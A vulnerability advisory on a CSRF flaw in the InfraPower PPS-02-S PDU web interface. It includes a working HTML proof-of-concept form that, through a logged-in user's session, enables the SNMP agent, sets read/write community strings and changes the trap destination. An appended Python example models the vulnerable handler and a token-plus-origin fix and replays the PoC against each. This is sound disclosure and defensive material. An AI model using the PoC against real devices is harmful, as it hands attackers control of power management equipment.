53 lines
1.8 KiB
Text
Executable file
InfraPower PPS-02-S Q213V1 Cross-Site Request Forgery


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient client application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify that
the request was intentionally issued by the logged-in user (no anti-CSRF
token in the form, no check of the request's origin). This can be
exploited to perform state-changing actions with admin privileges, such
as enabling the SNMP agent and setting its read and write community
strings and trap destination as the PoC below does, if a logged-in user
visits a malicious web site.

Tested on: Linux 2.6.28 (armv5tel)
           lighttpd/1.4.30-devel-1321
           PHP/5.3.9
           SQLite/3.7.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5375
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5375.php


27.09.2016

--


PoC:


<html>
  <body>
    <!-- Cross-site POST to the dongle's SNMP settings page. The victim's
         browser attaches its existing session cookie for 192.168.0.17,
         so the device applies the new SNMP agent settings as that user. -->
    <form action="http://192.168.0.17/SNMP.php?Menu=SMP" method="POST">
      <input type="hidden" name="SNMPAgent" value="Enable" />
      <input type="hidden" name="CommuintyString" value="public" />
      <input type="hidden" name="CommuintyWrite" value="private" />
      <input type="hidden" name="TrapsVersion" value="v2Trap" />
      <input type="hidden" name="IP" value="192.168.0.254" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
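As an added example (not code from the advisory or from the vendor's firmware), the following Python models the SNMP.php handler the PoC targets, first as the advisory describes it (a valid session cookie is the only check) and then with a per-session anti-CSRF token compared in constant time plus an Origin/Referer check, and replays the PoC form against both. The device origin, the PHPSESSID cookie name, the csrf_token field name and the in-memory session store are assumptions made for the example.

```python
"""Added example, not code from the ZSL-2016-5375 advisory or the vendor's
firmware: a model of the SNMP settings handler before and after anti-CSRF
checks, replayed against the cross-site POST the PoC form generates.
Assumed: the device origin, a PHPSESSID session cookie, a csrf_token field."""
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

DEVICE_ORIGIN = "http://192.168.0.17"  # assumed: the dongle's own origin

@dataclass
class Request:
    method: str
    headers: dict
    cookies: dict
    form: dict

@dataclass
class Session:
    sid: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))
    snmp: dict = field(default_factory=dict)

SESSIONS = {}

def login(sid):
    """Create a logged-in session; the token is minted once per session."""
    SESSIONS[sid] = Session(sid)
    return SESSIONS[sid]

def _session_for(req):
    return SESSIONS.get(req.cookies.get("PHPSESSID"))

def snmp_handler_vulnerable(req):
    """What the advisory describes: a valid session cookie is the only check,
    so any page the victim visits can submit this form on their behalf."""
    s = _session_for(req)
    if req.method != "POST" or s is None:
        return 403, "forbidden"
    s.snmp.update(req.form)
    return 200, "saved"

def _same_origin(req):
    """Origin (or Referer as a fallback) must name the device itself.
    A missing header is rejected: browsers send Origin on cross-site POSTs."""
    src = req.headers.get("Origin") or req.headers.get("Referer")
    if not src:
        return False
    u = urlsplit(src)
    return f"{u.scheme}://{u.netloc}" == DEVICE_ORIGIN

def snmp_handler_fixed(req):
    """Hardened handler: per-session token embedded in the form, compared in
    constant time, plus the origin check as defence in depth."""
    s = _session_for(req)
    if req.method != "POST" or s is None:
        return 403, "forbidden"
    submitted = req.form.get("csrf_token", "")
    token_ok = hmac.compare_digest(submitted.encode(), s.csrf_token.encode())
    if not _same_origin(req) or not token_ok:
        return 403, "csrf check failed"
    s.snmp.update({k: v for k, v in req.form.items() if k != "csrf_token"})
    return 200, "saved"

# Constructed: the fields the PoC form posts (names spelled as the device
# expects them), sent from the attacker's page as the Origin.
POC_FORM = {
    "SNMPAgent": "Enable",
    "CommuintyString": "public",
    "CommuintyWrite": "private",
    "TrapsVersion": "v2Trap",
    "IP": "192.168.0.254",
}

def cross_site_post(sid):
    hdrs = {"Origin": "http://attacker.example",
            "Referer": "http://attacker.example/poc.html"}
    return Request("POST", hdrs, {"PHPSESSID": sid}, dict(POC_FORM))

def legitimate_post(session):
    hdrs = {"Origin": DEVICE_ORIGIN,
            "Referer": DEVICE_ORIGIN + "/SNMP.php?Menu=SMP"}
    form = dict(POC_FORM, csrf_token=session.csrf_token)
    return Request("POST", hdrs, {"PHPSESSID": session.sid}, form)

def demo():
    """Replay the PoC against both handlers; returns status codes and the
    write community string that ended up stored in each session."""
    v = login("victim-vuln")
    f = login("victim-fixed")
    return {
        "vuln_status": snmp_handler_vulnerable(cross_site_post(v.sid))[0],
        "vuln_write_community": v.snmp.get("CommuintyWrite"),
        "fixed_status": snmp_handler_fixed(cross_site_post(f.sid))[0],
        "fixed_write_community": f.snmp.get("CommuintyWrite"),
        "fixed_legit_status": snmp_handler_fixed(legitimate_post(f))[0],
    }

if __name__ == "__main__":
    print(demo())
```

Against the vulnerable handler the replayed PoC returns 200 and the write community string "private" is stored; against the hardened handler the same request fails both the origin check and the token comparison, while the genuine form (same fields plus the session's token, posted from the device's own page) is still accepted. The token check alone is sufficient; the origin check catches requests that carry a leaked or guessed token from another site.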